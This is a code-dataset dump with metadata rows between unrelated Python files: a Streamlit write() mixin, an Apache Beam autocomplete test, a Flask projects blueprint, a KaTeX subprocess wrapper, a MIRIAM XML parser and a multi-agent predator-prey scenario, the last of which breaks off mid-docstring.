    delta = encode_delta(hgslice, pixels, width, height, bpp)
    blocks = encode_blocks(hgslice, delta, width, height, bpp)
    data, cmd = encode_zrle(hgslice, blocks)
    return HgData(data, cmd)
def decode_slice(hgslice:HgSlice, hgdata:HgData, width:int, height:int, bpp:int) -> bytearray:
    """decode_slice(hgslice, HgData(data bytes, cmd bytes), width, height, bpp) -> pixels bytearray

    Full decode pipeline for one slice, the inverse of encode_slice:
    zero run-length decode the blocks, split the lane sections back into
    delta bytes, then undo the delta filter.

    Fix vs. original: the function stopped after decode_zrle (and tried to
    unpack its single bytearray result into two names); the blocks/delta
    stages and the return were missing.
    """
    blocks = decode_zrle(hgslice, hgdata.data, hgdata.cmd)
    delta = decode_blocks(hgslice, blocks, width, height, bpp)
    pixels = decode_delta(hgslice, delta, width, height, bpp)
    return pixels
## CLEANUP ##
# NOTE(review): these names are removed to keep the module namespace clean.
# All defs above have already evaluated their annotations by this point, but
# runtime annotation introspection (e.g. typing.get_type_hints) will fail
# after these deletions -- confirm nothing downstream relies on it.
del enum, collections # only used during type declarations
del Iterable, Iterator, List, Optional, NoReturn, Tuple, Type, Union # only used during declarations
| 37.519454
| 192
| 0.551814
|
4a0a2de4a48a72bb8154ec6eceb7b65dad656e62
| 8,724
|
py
|
Python
|
lib/streamlit/elements/write.py
|
rpyleonard/streamlit
|
2d523cfe9a2a211602bb883de028c5bb85558f5f
|
[
"Apache-2.0"
] | 1
|
2021-01-29T02:32:53.000Z
|
2021-01-29T02:32:53.000Z
|
lib/streamlit/elements/write.py
|
PickMio/streamlit
|
bd41a464d010db587b5e5709ab68d062af0c14d9
|
[
"Apache-2.0"
] | 64
|
2021-01-06T17:40:21.000Z
|
2022-03-25T05:12:26.000Z
|
lib/streamlit/elements/write.py
|
PickMio/streamlit
|
bd41a464d010db587b5e5709ab68d062af0c14d9
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018-2020 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json as json
import types
from typing import cast, Any, List, Tuple, Type
import numpy as np
import streamlit
from streamlit import type_util
from streamlit.errors import StreamlitAPIException
# Special methods:
# Types for which write() shows introspection output (via self.dg.help)
# instead of trying to render the value itself.
HELP_TYPES = (
    types.BuiltinFunctionType,
    types.BuiltinMethodType,
    types.FunctionType,
    types.MethodType,
    types.ModuleType,
)  # type: Tuple[Type[Any], ...]
class WriteMixin:
    def write(self, *args, **kwargs):
        """Write arguments to the app.

        This is the Swiss Army knife of Streamlit commands: it does different
        things depending on what you throw at it. Unlike other Streamlit commands,
        write() has some unique properties:

        1. You can pass in multiple arguments, all of which will be written.
        2. Its behavior depends on the input types as follows.
        3. It returns None, so its "slot" in the App cannot be reused.

        Parameters
        ----------
        *args : any
            One or many objects to print to the App.

            Arguments are handled as follows:

            - write(string)     : Prints the formatted Markdown string, with
              support for LaTeX expression and emoji shortcodes.
              See docs for st.markdown for more.
            - write(data_frame) : Displays the DataFrame as a table.
            - write(error)      : Prints an exception specially.
            - write(func)       : Displays information about a function.
            - write(module)     : Displays information about the module.
            - write(dict)       : Displays dict in an interactive widget.
            - write(obj)        : The default is to print str(obj).
            - write(mpl_fig)    : Displays a Matplotlib figure.
            - write(altair)     : Displays an Altair chart.
            - write(keras)      : Displays a Keras model.
            - write(graphviz)   : Displays a Graphviz graph.
            - write(plotly_fig) : Displays a Plotly figure.
            - write(bokeh_fig)  : Displays a Bokeh figure.
            - write(sympy_expr) : Prints SymPy expression using LaTeX.

        unsafe_allow_html : bool
            This is a keyword-only argument that defaults to False.

            By default, any HTML tags found in strings will be escaped and
            therefore treated as pure text. This behavior may be turned off by
            setting this argument to True.

            That said, *we strongly advise against it*. It is hard to write secure
            HTML, so by using this argument you may be compromising your users'
            security. For more information, see:

            https://github.com/streamlit/streamlit/issues/152

            **Also note that `unsafe_allow_html` is a temporary measure and may be
            removed from Streamlit at any time.**

            If you decide to turn on HTML anyway, we ask you to please tell us your
            exact use case here:
            https://discuss.streamlit.io/t/96 .

            This will help us come up with safe APIs that allow you to do what you
            want.

        Example
        -------

        Its basic use case is to draw Markdown-formatted text, whenever the
        input is a string:

        >>> st.write('Hello, *World!* :sunglasses:')

        .. output::
           https://static.streamlit.io/0.50.2-ZWk9/index.html?id=Pn5sjhgNs4a8ZbiUoSTRxE
           height: 50px

        As mentioned earlier, `st.write()` also accepts other data formats, such as
        numbers, data frames, styled data frames, and assorted objects:

        >>> st.write(1234)
        >>> st.write(pd.DataFrame({
        ...     'first column': [1, 2, 3, 4],
        ...     'second column': [10, 20, 30, 40],
        ... }))

        .. output::
           https://static.streamlit.io/0.25.0-2JkNY/index.html?id=FCp9AMJHwHRsWSiqMgUZGD
           height: 250px

        Finally, you can pass in multiple arguments to do things like:

        >>> st.write('1 + 1 = ', 2)
        >>> st.write('Below is a DataFrame:', data_frame, 'Above is a dataframe.')

        .. output::
           https://static.streamlit.io/0.25.0-2JkNY/index.html?id=DHkcU72sxYcGarkFbf4kK1
           height: 300px

        Oh, one more thing: `st.write` accepts chart objects too! For example:

        >>> import pandas as pd
        >>> import numpy as np
        >>> import altair as alt
        >>>
        >>> df = pd.DataFrame(
        ...     np.random.randn(200, 3),
        ...     columns=['a', 'b', 'c'])
        ...
        >>> c = alt.Chart(df).mark_circle().encode(
        ...     x='a', y='b', size='c', color='c', tooltip=['a', 'b', 'c'])
        >>>
        >>> st.write(c)

        .. output::
           https://static.streamlit.io/0.25.0-2JkNY/index.html?id=8jmmXR8iKoZGV4kXaKGYV5
           height: 200px

        """
        string_buffer = []  # type: List[str]
        unsafe_allow_html = kwargs.get("unsafe_allow_html", False)

        # This bans some valid cases like: e = st.empty(); e.write("a", "b").
        # BUT: 1) such cases are rare, 2) this rule is easy to understand,
        # and 3) this rule should be removed once we have st.container()
        if not self.dg._is_top_level and len(args) > 1:
            raise StreamlitAPIException(
                "Cannot replace a single element with multiple elements.\n\n"
                "The `write()` method only supports multiple elements when "
                "inserting elements rather than replacing. That is, only "
                "when called as `st.write()` or `st.sidebar.write()`."
            )

        def flush_buffer():
            # Emit any strings accumulated so far as one markdown element.
            if string_buffer:
                self.dg.markdown(
                    " ".join(string_buffer),
                    unsafe_allow_html=unsafe_allow_html,
                )
                string_buffer[:] = []

        for arg in args:
            # Order matters!
            if isinstance(arg, str):
                string_buffer.append(arg)
            elif type_util.is_dataframe_like(arg):
                flush_buffer()
                # >2-dimensional data cannot be shown as a table; fall back to text.
                if len(np.shape(arg)) > 2:
                    self.dg.text(arg)
                else:
                    self.dg.dataframe(arg)
            elif isinstance(arg, Exception):
                flush_buffer()
                self.dg.exception(arg)
            elif isinstance(arg, HELP_TYPES):
                flush_buffer()
                self.dg.help(arg)
            elif type_util.is_altair_chart(arg):
                flush_buffer()
                self.dg.altair_chart(arg)
            elif type_util.is_type(arg, "matplotlib.figure.Figure"):
                flush_buffer()
                self.dg.pyplot(arg)
            elif type_util.is_plotly_chart(arg):
                flush_buffer()
                self.dg.plotly_chart(arg)
            elif type_util.is_type(arg, "bokeh.plotting.figure.Figure"):
                flush_buffer()
                self.dg.bokeh_chart(arg)
            elif type_util.is_graphviz_chart(arg):
                flush_buffer()
                self.dg.graphviz_chart(arg)
            elif type_util.is_sympy_expession(arg):
                # NOTE(review): "expession" looks misspelled, but this name
                # must match the definition in type_util — fix both together.
                flush_buffer()
                self.dg.latex(arg)
            elif type_util.is_keras_model(arg):
                # Imported lazily so tensorflow is only required when used.
                from tensorflow.python.keras.utils import vis_utils

                flush_buffer()
                dot = vis_utils.model_to_dot(arg)
                self.dg.graphviz_chart(dot.to_string())
            elif isinstance(arg, (dict, list)):
                flush_buffer()
                self.dg.json(arg)
            elif type_util.is_namedtuple(arg):
                flush_buffer()
                self.dg.json(json.dumps(arg._asdict()))
            elif type_util.is_pydeck(arg):
                flush_buffer()
                self.dg.pydeck_chart(arg)
            else:
                # Fallback: render repr(arg) as inline code, escaping backticks.
                string_buffer.append("`%s`" % str(arg).replace("`", "\\`"))
        flush_buffer()

    @property
    def dg(self) -> "streamlit.delta_generator.DeltaGenerator":
        """Get our DeltaGenerator."""
        return cast("streamlit.delta_generator.DeltaGenerator", self)
| 38.09607
| 89
| 0.576112
|
4a0a2e9704af8a9a89a32122e52c44c8cd813e62
| 675
|
py
|
Python
|
api/generators/MapGeneratorBeatStrategy.py
|
strategineer/lynchman
|
7b07c15c801841ad3f94734d6912d248c3f1bcbd
|
[
"MIT"
] | 1
|
2019-04-12T23:49:01.000Z
|
2019-04-12T23:49:01.000Z
|
api/generators/MapGeneratorBeatStrategy.py
|
KeikakuB/lynchman
|
7b07c15c801841ad3f94734d6912d248c3f1bcbd
|
[
"MIT"
] | null | null | null |
api/generators/MapGeneratorBeatStrategy.py
|
KeikakuB/lynchman
|
7b07c15c801841ad3f94734d6912d248c3f1bcbd
|
[
"MIT"
] | 1
|
2021-08-15T13:15:07.000Z
|
2021-08-15T13:15:07.000Z
|
from .MapGeneratorStrategy import MapGeneratorStrategy
from api.data.Block import Block
import api.data.Constants
from api.data.JsonNoteType import JsonNoteType
class MapGeneratorBeatStrategy(MapGeneratorStrategy):
    """Generator strategy that drops an identical note on every other beat."""

    def __init__(self, song):
        MapGeneratorStrategy.__init__(self, song)

    def _generate(self):
        # Walk the song's beats, placing a note on every second one.
        for beat in self._song.get_beat_times()[::2]:
            note_time = float("{:.16f}".format(beat))
            block = Block(
                JsonNoteType.RIGHT.value,
                (2, 0),
                api.data.Constants.N_CUT_DIRECTIONS - 1,
            )
            self._add_note(note_time, block)
| 39.705882
| 137
| 0.715556
|
4a0a2f2be776f10b0b810e13854bba629751c666
| 629
|
py
|
Python
|
utils/md/katex.py
|
zerolfx/aiplay-api
|
73161ce8fba67c392df73b452984f6cb09fc48e7
|
[
"MIT"
] | 3
|
2017-02-21T01:11:45.000Z
|
2020-11-17T13:08:12.000Z
|
utils/md/katex.py
|
zerolfx/aiplay-api
|
73161ce8fba67c392df73b452984f6cb09fc48e7
|
[
"MIT"
] | null | null | null |
utils/md/katex.py
|
zerolfx/aiplay-api
|
73161ce8fba67c392df73b452984f6cb09fc48e7
|
[
"MIT"
] | null | null | null |
import re
import subprocess
_katex_error_message = '<span class="katex">ERROR</span>'
_katex_empty_message = '<span class="katex"></span>'


def convert(eqn_string):
    """Takes equation string, e.g. "E = mc^2", and outputs KaTeX HTML.

    Shells out to the bundled ``katex.port.js`` via node. Returns the
    rendered HTML on success, or a fixed error placeholder when rendering
    fails for any reason: node missing from PATH, the render script
    erroring out (non-zero exit), or the render exceeding 20 seconds.
    """
    import os
    script = os.path.join(os.path.dirname(__file__), 'katex.port.js')
    try:
        # subprocess.run handles pipe cleanup and timeouts for us; the old
        # Popen/wait combination leaked the stdout pipe and let
        # TimeoutExpired and FileNotFoundError escape to the caller.
        result = subprocess.run(
            ['node', script, eqn_string],
            stdout=subprocess.PIPE,
            timeout=20,
        )
    except (OSError, subprocess.TimeoutExpired):
        # node not installed, or the render hung.
        return _katex_error_message
    if result.returncode != 0:
        return _katex_error_message
    return result.stdout.decode()
| 31.45
| 92
| 0.666137
|
4a0a2f333920d67bb54bcdc40d8b37e9cfb2fe50
| 1,711
|
py
|
Python
|
app/blueprints/open/routes/projects.py
|
neurothrone/project-dot
|
20889075611bed645689a76a30257f96e4b55988
|
[
"MIT"
] | null | null | null |
app/blueprints/open/routes/projects.py
|
neurothrone/project-dot
|
20889075611bed645689a76a30257f96e4b55988
|
[
"MIT"
] | null | null | null |
app/blueprints/open/routes/projects.py
|
neurothrone/project-dot
|
20889075611bed645689a76a30257f96e4b55988
|
[
"MIT"
] | null | null | null |
from flask import flash, make_response, redirect, render_template, request, url_for
from .. import bp_open
from app.controllers.project import ProjectController
@bp_open.get("/projects")
def projects():
    """Render the project index page, filtered by an optional title search."""
    query = request.args.get("search_text", "")
    page_number = request.args.get("page", 1, type=int)
    page = ProjectController.get_all_by_ilike_title_paginated(query, page_number)
    return render_template(
        "open/projects/index.html",
        search_text=query,
        paginator=page,
    )
@bp_open.get("/projects/search")
def search_projects():
    """Serve project search results: an HTML fragment for HTMX callers,
    a full page for everyone else."""
    search_text = request.args.get("search_text", "")
    page = request.args.get("page", 1, type=int)
    paginator = ProjectController.get_all_by_ilike_title_paginated(search_text, page)
    context = {"search_text": search_text, "paginator": paginator}

    # HTMX marks its requests with an HX-Request header.
    if "HX-Request" in request.headers:
        fragment = render_template(
            "open/shared/partials/projects_search_results.html", **context)
        return make_response(fragment)

    return render_template("open/shared/partials/search.html", **context)
@bp_open.get("/projects/<int:project_id>")
def view_project(project_id: int):
    """Show the detail page for one project; redirect with a flash if missing."""
    if not (project := ProjectController.get_by_id(project_id)):
        flash("There is no project by that id.", category="error")
        # NOTE(review): no "index" endpoint is defined in this module —
        # confirm the blueprint registers one elsewhere, otherwise this
        # should likely be url_for(".projects").
        return redirect(url_for(".index"))
    return render_template("open/projects/view_project.html",
                           project=project)
| 36.404255
| 85
| 0.672706
|
4a0a2fc1802398f01e29a4b0b2f1080e56ffce07
| 4,522
|
py
|
Python
|
sdks/python/apache_beam/examples/complete/autocomplete_test.py
|
prabhaarya/beam
|
150e311a0d78f827396dd5090004752134622771
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
sdks/python/apache_beam/examples/complete/autocomplete_test.py
|
prabhaarya/beam
|
150e311a0d78f827396dd5090004752134622771
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 6
|
2022-02-18T15:52:33.000Z
|
2022-03-09T22:25:01.000Z
|
sdks/python/apache_beam/examples/complete/autocomplete_test.py
|
prabhaarya/beam
|
150e311a0d78f827396dd5090004752134622771
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Test for the autocomplete example."""
# pytype: skip-file
import logging
import os
import re
import tempfile
import unittest
import pytest
import apache_beam as beam
from apache_beam.examples.complete import autocomplete
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.test_utils import compute_hash
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
from apache_beam.testing.util import open_shards
def format_output_file(output_string):
    """Parse autocomplete output text into [(prefix, ((count, word), ...)), ...]."""

    def parse_entry(entry):
        # Fragments look like "(3, 'to'" — strip punctuation, then split.
        cleaned = entry.replace('(', '').replace(')', '').replace(
            '"', '').replace("'", '').replace(' ', '')
        count, word = cleaned.split(',')
        return int(count), word

    def parse_line(line):
        # Each line has the shape "prefix: [(count, 'word'), ...]".
        match = re.match(r'(.*): \[(.*)\]', line)
        entries = match.group(2).split("), (")
        return match.group(1), tuple(parse_entry(e) for e in entries)

    return [parse_line(line) for line in output_string.split('\n')]
def create_content_input_file(path, contents):
    """Write *contents* to a new text file at *path*, logging the location.

    The file is written as UTF-8 explicitly so test input does not depend
    on the platform's default encoding.
    """
    logging.info('Creating temp file: %s', path)
    with open(path, 'w', encoding='utf-8') as f:
        f.write(contents)
class AutocompleteTest(unittest.TestCase):
    """Unit and integration tests for the autocomplete example pipeline."""

    # Small in-memory corpus used by the unit test and the small-input test.
    WORDS = ['this', 'this', 'that', 'to', 'to', 'to']
    # Checksum of the expected output of the King Lear integration run.
    KINGLEAR_HASH_SUM = 268011785062540
    KINGLEAR_INPUT = 'gs://dataflow-samples/shakespeare/kinglear.txt'
    # Expected prefix -> ((count, word), ...) expansions for WORDS.
    EXPECTED_PREFIXES = [
        ('t', ((3, 'to'), (2, 'this'), (1, 'that'))),
        ('to', ((3, 'to'), )),
        ('th', ((2, 'this'), (1, 'that'))),
        ('thi', ((2, 'this'), )),
        ('this', ((2, 'this'), )),
        ('tha', ((1, 'that'), )),
        ('that', ((1, 'that'), )),
    ]

    def test_top_prefixes(self):
        """TopPerPrefix over the in-memory corpus yields EXPECTED_PREFIXES."""
        with TestPipeline() as p:
            words = p | beam.Create(self.WORDS)
            result = words | autocomplete.TopPerPrefix(5)
            # values must be hashable for now
            result = result | beam.Map(lambda k_vs: (k_vs[0], tuple(k_vs[1])))
            assert_that(result, equal_to(self.EXPECTED_PREFIXES))

    @pytest.mark.it_postcommit
    def test_autocomplete_it(self):
        """Integration run over King Lear, verified via an order-insensitive checksum."""
        with TestPipeline(is_integration_test=True) as p:
            words = p | beam.io.ReadFromText(self.KINGLEAR_INPUT)
            result = words | autocomplete.TopPerPrefix(10)
            # values must be hashable for now
            result = result | beam.Map(
                lambda k_vs: [k_vs[0], k_vs[1][0][0], k_vs[1][0][1]])
            checksum = (
                result
                | beam.Map(lambda x: int(compute_hash(x)[:8], 16))
                | beam.CombineGlobally(sum))
            assert_that(checksum, equal_to([self.KINGLEAR_HASH_SUM]))

    @pytest.mark.no_xdist
    @pytest.mark.examples_postcommit
    def test_autocomplete_output_files_on_small_input(self):
        """End-to-end run of the example binary on a temp-file corpus."""
        test_pipeline = TestPipeline(is_integration_test=True)
        # Setup the files with expected content.
        temp_folder = tempfile.mkdtemp()
        create_content_input_file(
            os.path.join(temp_folder, 'input.txt'), ' '.join(self.WORDS))
        extra_opts = {
            'input': '%s/input.txt' % temp_folder,
            'output': os.path.join(temp_folder, 'result')
        }
        autocomplete.run(test_pipeline.get_full_options_as_args(**extra_opts))
        # Load result file and compare.
        with open_shards(os.path.join(temp_folder, 'result-*-of-*')) as result_file:
            result = result_file.read().strip()
        self.assertEqual(
            sorted(self.EXPECTED_PREFIXES), sorted(format_output_file(result)))
if __name__ == '__main__':
unittest.main()
| 34
| 80
| 0.683547
|
4a0a2fd1f0b4f985eb69e4c04916a8c78c567c35
| 1,603
|
py
|
Python
|
cbmpy-tools/miriam-tools/parseMIRIAM.py
|
bgoli/cbmpy-dev
|
04a6179af8e04aefdb49ed97f34544ede8180005
|
[
"BSD-2-Clause"
] | null | null | null |
cbmpy-tools/miriam-tools/parseMIRIAM.py
|
bgoli/cbmpy-dev
|
04a6179af8e04aefdb49ed97f34544ede8180005
|
[
"BSD-2-Clause"
] | null | null | null |
cbmpy-tools/miriam-tools/parseMIRIAM.py
|
bgoli/cbmpy-dev
|
04a6179af8e04aefdb49ed97f34544ede8180005
|
[
"BSD-2-Clause"
] | null | null | null |
# NOTE(review): Python 2 script — uses file() and print statements.
# Scrapes MIRIAM resource metadata out of an XML dump with regexes and
# writes the result to miriamids.py as a pretty-printed dict literal.
import os, time, numpy, re, pprint

# Directory containing this script.
cDir = os.path.dirname(os.path.abspath(os.sys.argv[0]))
#import pyscescbm as cbm

PP = pprint.PrettyPrinter()

## mDir = os.path.join(cDir, 'miriam')
mDir = cDir
mFile = os.path.join(mDir, 'miriamresources.xml')
F = file(mFile, 'r')
res = F.read()
F.close()

# Each <datatype ...>...</datatype> element describes one MIRIAM resource.
datatype = re.compile('<datatype id=.*?</datatype>', re.DOTALL)
res2 = re.findall(datatype, res)
print len(res2)

# Field extractors applied within a single datatype element.
name = re.compile('<name>.*?</name>')
uri = re.compile('<uri type="URL">.*?</uri>')
dataEntry = re.compile('<dataEntry>.*?</dataEntry>', re.DOTALL)
regex = re.compile('pattern=.*?>')
exam = re.compile('<dataEntityExample>.*?</dataEntityExample>')

out = {}
for r_ in res2:
    # Strip the surrounding tags from each matched field.
    nm = re.findall(name, r_)[0].replace('<name>', '').replace('</name>', '').strip()
    ur = re.findall(uri, r_)[0].replace('<uri type="URL">', '').replace('</uri>', '').strip()
    de = re.findall(dataEntry, r_)[0].replace('<dataEntry>', '').replace('</dataEntry>', '').strip()
    rx = re.findall(regex, r_)[0].replace(' restricted="true"', '').replace('pattern="', '').replace('">', '').strip()
    # The example element is optional.
    ex = re.findall(exam, r_)
    if len(ex) > 0:
        ex = ex[0].replace('<dataEntityExample>', '').replace('</dataEntityExample>', '').strip()
    else:
        ex = None
    out.update({nm: {
        'name': nm,
        'url': ur,
        'data_entry': de,
        'pattern': rx,
        'example': ex
    }})

p = PP.pformat(out)
print p

# Emit the collected dict as an importable Python module.
F = file(os.path.join(mDir, 'miriamids.py'), 'w')
F.write('# created on %s\n\n' % time.strftime('%y%m%d:%H%M'))
F.write('miriamids =\\\n')
F.write(p)
F.write('\n')
F.close()
| 29.145455
| 116
| 0.584529
|
4a0a30d7a080e8ba6d2609f54bce73be26709ec9
| 9,720
|
py
|
Python
|
multiagent/scenarios/simple_tax_noop.py
|
ngrupen/multiagent-particle-envs
|
0379c39ed5792a08c2e23a7183d2f690af38fcc6
|
[
"MIT"
] | null | null | null |
multiagent/scenarios/simple_tax_noop.py
|
ngrupen/multiagent-particle-envs
|
0379c39ed5792a08c2e23a7183d2f690af38fcc6
|
[
"MIT"
] | null | null | null |
multiagent/scenarios/simple_tax_noop.py
|
ngrupen/multiagent-particle-envs
|
0379c39ed5792a08c2e23a7183d2f690af38fcc6
|
[
"MIT"
] | null | null | null |
import numpy as np
import math
from multiagent.core import World, Agent, Landmark, Wall
from multiagent.scenario import BaseScenario
from multiagent.utils import overlaps, toroidal_distance
# Per-scheme render colors for the predator agents, indexed by agent id.
# Selected in Scenario.make_world via the color_scheme argument.
COLOR_SCHEMES = {
    'regular': [np.array([0.85, 0.35, 0.35]), np.array([0.85, 0.35, 0.35]), np.array([0.85, 0.35, 0.35])],
    'two_slow': [np.array([0.85, 0.35, 0.35]), np.array([0.45, 0.15, 0.0]), np.array([0.45, 0.15, 0.0])],
    'two_fast': [np.array([0.85, 0.35, 0.35]), np.array([0.85, 0.35, 0.35]), np.array([0.15, 0.05, 0.0])],
    'staggered': [np.array([0.85, 0.35, 0.35]), np.array([0.55, 0.25, 0.65]), np.array([0.55, 0.25, 0.0])]
}
class Scenario(BaseScenario):
    """Predator-prey scenario on a toroidal world with a capture-reward tax
    shared among active predators."""

    def make_world(self, size=6.0, n_preds=3, pred_vel=1.2, prey_vel=1.0, cap_reward=50.0, tax=0.0, discrete=True,
                   partial=False, symmetric=False, action_penalty=0.0, color_scheme='regular'):
        """Build and return the World with n_preds predators and one prey.

        pred_vel may be a scalar (shared) or a per-predator list.
        """
        world = World()
        # set any world properties
        world.n_steps = 500
        world.torus = True
        world.dim_c = 2
        world.size = size
        world.origin = np.array([world.size/2, world.size/2])
        world.use_sensor_range = False
        world.cap_reward = cap_reward
        world.partial = partial
        world.tax = tax
        world.symmetric = symmetric
        world.action_penalty = action_penalty
        world.predator_colors = COLOR_SCHEMES[color_scheme]
        print('world size = {}'.format(world.size))
        print('pred vel = {}'.format(pred_vel))
        print('prey vel = {}'.format(prey_vel))
        print('tax = {}'.format(world.tax))
        print('action penalty = {}'.format(world.action_penalty))
        print('capture reward = {}'.format(world.cap_reward))
        num_good_agents = 1
        self.n_preds = num_adversaries = n_preds
        num_agents = num_adversaries + num_good_agents
        num_landmarks = 0
        # add agents: predators first (adversary=True), prey last
        world.agents = [Agent() for i in range(num_agents)]
        for i, agent in enumerate(world.agents):
            agent.name = 'agent {}'.format(i)
            agent.id = i
            agent.active = True
            agent.captured = False
            agent.collide = True
            agent.silent = True
            agent.adversary = True if i < num_adversaries else False
            agent.size = 0.075 if agent.adversary else 0.05
            agent.accel = 20.0 if agent.adversary else 20.0
            if agent.adversary:
                # per-predator speeds if a list was supplied
                if isinstance(pred_vel, list):
                    agent.max_speed = pred_vel[i]
                else:
                    agent.max_speed = pred_vel
            else:
                agent.max_speed = prey_vel
        print('n_preds = {}'.format(len(world.agents) - 1))
        # discrete actions
        world.discrete_actions = discrete
        # make initial conditions
        self.reset_world(world)
        return world

    def reset_world(self, world):
        """Re-randomize agent positions and reset per-agent episode flags."""
        world.origin = np.array([world.size/2, world.size/2])
        print('world size = {}'.format(world.size))
        print('pred vel = {}'.format(world.agents[0].max_speed))
        print('prey vel = {}'.format(world.agents[-1].max_speed))
        print('tax = {}'.format(world.tax))
        print('action penalty = {}'.format(world.action_penalty))
        print('capture reward = {}'.format(world.cap_reward))
        # agent color
        for i, agent in enumerate(world.agents):
            if agent.adversary:
                agent.color = world.predator_colors[i]
            else:
                agent.color = np.array([0.35, 0.85, 0.35])
        # properties for landmarks
        for i, landmark in enumerate(world.landmarks):
            landmark.color = np.array([0.25, 0.25, 0.25])
        # generate predators in random circle of random radius with random angles
        redraw = True
        while redraw:
            # draw location for prey (near the world center)
            prey_pt = world.origin + np.random.normal(0.0, 0.0001, size=2)
            # draw predator locations
            init_pts = [np.random.uniform(0.0, world.size, size=2) for _ in range(self.n_preds)]
            # init_pts = [np.array([1.5, 1.5]) + np.random.normal(0.0, 0.01, size=2), np.array([1.5, 1.5])+np.random.normal(0.0, 0.01, size=2), np.array([1.5, 1.5])]
            # ensure predators not initialized on top of prey
            redraw = overlaps(prey_pt, init_pts, world.size, threshold=0.5)
        # set initial states
        init_pts.append(prey_pt)
        for i, agent in enumerate(world.agents):
            agent.active = True
            agent.captured = False
            # agents can move beyond confines of camera image --> need to adjust coords accordingly
            agent.state.coords = init_pts[i]
            agent.state.p_pos = agent.state.coords % world.size
            agent.state.p_vel = np.zeros(world.dim_p)
            agent.state.theta = 0.0
            agent.state.c = np.zeros(world.dim_c)

    def benchmark_data(self, agent, world):
        """Data recorded for benchmarking: whether the agent is still active."""
        return {'active': agent.active}

    def is_collision(self, agent1, agent2):
        """Return True if the two (distinct) agents' bodies overlap."""
        if agent1 == agent2:
            return False
        delta_pos = agent1.state.p_pos - agent2.state.p_pos
        dist = np.sqrt(np.sum(np.square(delta_pos)))
        dist_min = agent1.size + agent2.size
        return True if dist < dist_min else False

    # return all agents that are not adversaries
    def good_agents(self, world):
        return [agent for agent in world.agents if not agent.adversary]

    # return all active agents that are not adversaries
    def active_good_agents(self, world):
        return [agent for agent in world.agents if not agent.adversary and agent.active]

    # return all adversarial agents
    def adversaries(self, world):
        return [agent for agent in world.agents if agent.adversary]

    # return all active adversarial agents
    def active_adversaries(self, world):
        return [agent for agent in world.agents if agent.adversary and agent.active]

    def reward(self, agent, world, action):
        """Dispatch to the predator or prey reward depending on the agent role."""
        main_reward = self.adversary_reward(agent, world, action) if agent.adversary else self.agent_reward(agent, world, action)
        return main_reward

    def agent_reward(self, agent, world, action):
        """Prey reward: small living bonus, large penalty when captured.

        Side effect: sets agent.captured on collision with a predator.
        """
        if agent.active:
            # Agents are negatively rewarded if caught by adversaries
            rew = 0.1
            adversaries = self.active_adversaries(world)
            if agent.collide:
                for a in adversaries:
                    if self.is_collision(a, agent):
                        agent.captured = True
                        rew -= 50
                        break
            return rew
        else:
            return 0.0

    def adversary_reward(self, agent, world, action):
        """Predator reward: capture reward split among capturers, with a
        `tax` fraction redistributed to non-capturing predators.

        Side effect: sets .captured on any prey that collides with a predator.
        """
        # Adversaries are rewarded for collisions with agents
        rew = -0.1
        # small penalty if agent chooses to move (action index 0 is no-op)
        if np.argmax(action[0]) != 0: rew -= world.action_penalty
        agents = self.active_good_agents(world)
        adversaries = self.active_adversaries(world)
        if agent.collide:
            capture_idxs, capture_advs = [], []
            for i, ag in enumerate(agents):
                for j, adv in enumerate(adversaries):
                    if self.is_collision(ag, adv):
                        capture_idxs.append(i)
                        capture_advs.append(adv)
                        ag.captured = True
            if len(set(capture_idxs)) > 0:
                if agent in capture_advs:
                    # capturer: untaxed share plus taxed share from co-capturers
                    rew += (world.cap_reward * (1 - world.tax) + world.cap_reward * world.tax/2 * (len(capture_advs)-1))/len(capture_advs)
                else:
                    # bystander predator: receives only the taxed portion
                    rew += (world.cap_reward * world.tax/2 * len(capture_advs))/len(capture_advs)
        return rew

    def terminal(self, agent, world):
        """Episode-termination test for one agent."""
        if agent.adversary:
            # predator done if all prey caught
            return all([agent.captured for agent in self.good_agents(world)])
        else:
            # prey done if caught
            return agent.captured

    def observation(self, agent, world):
        """Observation: own position followed by other agents' positions.

        Under world.partial, predators see only the prey; the prey always
        sees everyone. Predator observations may be symmetrized.
        """
        # if agent.adversary:
        #     ag_pos = agent.state.p_pos
        # print('agent {} pos = {}'.format(agent.id, agent.state.p_pos))
        # pred/prey observations
        other_pos = []
        for other in world.agents:
            if other is agent: continue
            # if not other.adversary:
            #     prey_pos = other.state.p_pos
            if world.partial:
                # partial observations
                if agent.adversary:
                    if not other.adversary:
                        other_pos.append(other.state.p_pos)
                else:
                    other_pos.append(other.state.p_pos)
            else:
                # full observations
                other_pos.append(other.state.p_pos)
        if world.symmetric and agent.adversary:
            other_pos = self.symmetrize(agent.id, other_pos)
        # if agent.adversary:
        #     dist = math.sqrt((prey_pos[0] - ag_pos[0])**2 + (prey_pos[1] - ag_pos[1])**2)
        #     print('distance = {}'.format(dist))
        #     num_steps = dist / 0.12
        #     pen = 0.1*num_steps
        #     rew = 50 - pen
        #     print('value if capture = {}'.format(rew))
        #     print('value if NO capture = {}'.format(-pen))
        obs = np.concatenate([agent.state.p_pos] + other_pos)
        return obs

    def symmetrize(self, agent_id, arr):
        """Reorder teammate observations so each predator sees a consistent ordering.

        # ensure symmetry in observation space
        # P1 --> P2, P3
        # P2 --> P3, P1
        # P3 --> P1, P2
        """
